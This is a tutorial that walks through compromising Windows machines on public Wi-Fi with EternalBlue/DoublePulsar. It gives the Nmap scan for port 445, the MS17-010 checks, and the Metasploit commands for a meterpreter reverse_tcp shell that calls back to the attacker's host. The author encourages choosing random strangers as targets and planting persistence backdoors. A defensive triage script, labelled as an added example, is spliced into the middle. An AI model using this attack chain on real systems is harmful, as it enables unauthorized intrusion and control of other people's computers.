Hello fellow pentesters. In this lesson I will show you how to pentest on a network, pick targets and gain access to them. The scenario here is: first we do reconnaissance, or information gathering, then we run a vulnerability scan, and finally we exploit. We will use EternalBlue and DoublePulsar; this exploit is a combination of the two: "EternalBlue", which is used as a backdoor on Windows, and "DoublePulsar", which is used to inject the DLL payload. We will also use Nmap and Metasploit. Let's jump into the terminal!
Reconnaisance > Vulnerability Scan > Exploit
First, connect to a wireless network. I used to connect to public Wi-Fi, like a cafe or other public areas, because having a random target is more fun, right? I will not go into how you could get into that network; that would be a very long tutorial by itself. I assume you are connected, so now take a note of what identifies you later. Know your local IP!
My IP : 192.168.1.70
Gateway : 192.168.1.1
Netmask : 255.255.255.0(/24)
From here you now know who you are, where you are, your machine's identity, and the network details.
Now start scanning and looking for a target :). As usual we will use Nmap. By the way, I will keep it short: I am interested in the EternalBlue and DoublePulsar exploit. Have you ever played around with it? Trust me, it is fun. And believe it or not, that famous exploit still works nowadays. Why? Because of the users, lol. EternalBlue and DoublePulsar are behind the WannaCry ransomware; if you have a Windows machine, consider blocking all vulnerable ports of the SMBv1 service to prevent a WannaCry attack or the EternalBlue and DoublePulsar exploit. By abusing a vulnerability in Windows' Server Message Block (SMB) on port 445, EternalBlue allowed the WannaCry ransomware to spread like a worm and hit over 200,000 machines within only a few days. Before WannaCry, however, a crypto-currency mining botnet dubbed Adylkuzz had been using the same exploit to compromise devices.
Run this command:
nmap -v -p445 192.168.1.1/24 | grep open
Tadaaa, we got an open port 445. This port replaces the notorious Windows NetBIOS trio (ports 137-139), for all versions of Windows after NT, as the preferred port for carrying Windows file sharing and numerous other services.
Add to note:
Target IP : 192.168.1.66
Check the vulnerability, run this command:
nmap -v -p445 [Target IP] --script vuln
As you can see, this target is vulnerable to ms17_010.
Ok, next step: while firing up msfconsole, find where that exploit is located.
Run this command:
Notice that there are two types of modules listed above: the Auxiliary scanner and the Exploit. We will use the Auxiliary module first and a different exploit module later. See this video to install the EternalBlue DoublePulsar exploit modules.
Now switch to the msfconsole window. First we use the scanner module to make sure the exploit will at least have a chance of succeeding ;).
Run this command:
use auxiliary/scanner/smb/smb_ms17_010
options
set RHOSTS [target IP]
run
Notice these output lines:
[+] 192.168.1.66:445 – Host is likely VULNERABLE to MS17-010! (Windows 7 Ultimate 7600)
[!] 192.168.1.66:445 – Host is likely INFECTED with DoublePulsar! – Arch: x86 (32-bit), XOR Key: 0x36CE8729
The target machine is x86 / 32-bit.
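The two scanner outputs above are exactly what a defender should be collecting from their own network. The following script is an added example, not part of the original post: it parses nmap's verbose "Discovered open port" lines and the smb_ms17_010 module's result lines into one record per host and assigns a remediation priority. The sample output is constructed from the formats shown in this post; the 192.168.1.80 host is invented.

```python
import re
from typing import Dict

# Constructed sample output, modelled on the formats shown in this post:
# nmap's verbose "Discovered open port" lines and the smb_ms17_010 scanner
# module lines. 192.168.1.66 and its XOR key are the post's; .80 is invented.
NMAP_OUTPUT = """\
Discovered open port 445/tcp on 192.168.1.66
Discovered open port 445/tcp on 192.168.1.80
"""
MSF_OUTPUT = """\
[+] 192.168.1.66:445 - Host is likely VULNERABLE to MS17-010! (Windows 7 Ultimate 7600)
[!] 192.168.1.66:445 - Host is likely INFECTED with DoublePulsar! - Arch: x86 (32-bit), XOR Key: 0x36CE8729
[*] 192.168.1.80:445 - Host does NOT appear vulnerable
"""

IP = r"(\d{1,3}(?:\.\d{1,3}){3})"
OPEN_RE = re.compile(r"Discovered open port 445/tcp on " + IP)
VULN_RE = re.compile(r"\[\+\] " + IP + r":445 .*likely VULNERABLE to MS17-010")
INFECTED_RE = re.compile(r"\[!\] " + IP + r":445 .*likely INFECTED with DoublePulsar.*XOR Key: (0x[0-9A-Fa-f]+)")

def _new() -> dict:
    return {"smb_exposed": False, "ms17_010": False, "doublepulsar_xor_key": None}

def triage(nmap_text: str, msf_text: str) -> Dict[str, dict]:
    """Merge both scanners' output into one record per host."""
    hosts: Dict[str, dict] = {}
    for m in OPEN_RE.finditer(nmap_text):
        hosts.setdefault(m.group(1), _new())["smb_exposed"] = True
    for m in VULN_RE.finditer(msf_text):
        hosts.setdefault(m.group(1), _new())["ms17_010"] = True
    for m in INFECTED_RE.finditer(msf_text):
        rec = hosts.setdefault(m.group(1), _new())
        rec["ms17_010"] = True  # an implanted host was exploitable by definition
        rec["doublepulsar_xor_key"] = m.group(2)
    return hosts

def remediation(rec: dict) -> str:
    """Pick the most urgent action for a host record, worst case first."""
    if rec["doublepulsar_xor_key"]:
        return "ISOLATE: DoublePulsar implant present; treat as compromised, reimage, then patch MS17-010"
    if rec["ms17_010"]:
        return "PATCH: apply MS17-010 and disable SMBv1"
    if rec["smb_exposed"]:
        return "REVIEW: TCP/445 reachable; firewall it if file sharing is not needed"
    return "OK"

if __name__ == "__main__":
    for ip, rec in sorted(triage(NMAP_OUTPUT, MSF_OUTPUT).items()):
        print(f"{ip:15} {remediation(rec)}")
```

The XOR key reported by the scanner is the implant's session key; recording it per host lets you confirm later that the backdoor is gone rather than merely re-keyed.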
Now it's time to exploit!
Run these commands:
use exploit/windows/smb/eternalblue_doublepulsar
set payload windows/meterpreter/reverse_tcp
set PROCESSINJECT spoolsv.exe
set RHOST 192.168.1.66
set LHOST 192.168.1.70
exploit
Exploit succeeded! Now we have a meterpreter session with high privileges. From here you can control this machine: run VNC, set up RDP, set a persistence backdoor to connect back to us automatically, etc. We have pwned their Windows machine.